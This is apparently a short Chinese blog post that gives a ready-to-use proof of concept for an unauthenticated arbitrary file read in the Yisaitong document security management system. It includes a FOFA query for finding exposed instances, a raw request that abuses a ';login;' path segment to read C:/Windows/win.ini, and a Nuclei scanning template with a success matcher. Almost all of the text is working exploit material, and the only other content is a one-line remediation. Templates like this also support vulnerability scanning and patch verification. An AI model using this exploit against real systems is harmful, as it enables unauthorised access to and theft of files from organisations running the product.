亿赛通电子文档安全管理系统 DecryptApplication 接口处任意文件读取漏洞,未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息,导致系统处于极不安全的状态。
app="亿赛通-电子文档安全管理系统"
GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=test1111 HTTP/1.1
Host:
id: yisaitong-DecryptApplication-fileread
info:
name: 亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞
author: nobody
severity: high
description: |
亿赛通电子文档安全管理系统 DecryptApplication 接口处任意文件读取漏洞,未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息
impact: |
未经身份验证的攻击者利用此漏洞获取系统内部敏感文件信息
remediation: |
升级版本,打补丁
metadata:
verified: true
max-request: 3
fofa-query: app="亿赛通-电子文档安全管理系统"
tags: fileread
requests:
- raw:
- |
GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=testtest HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200 && contains_all(body,"[files]")
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.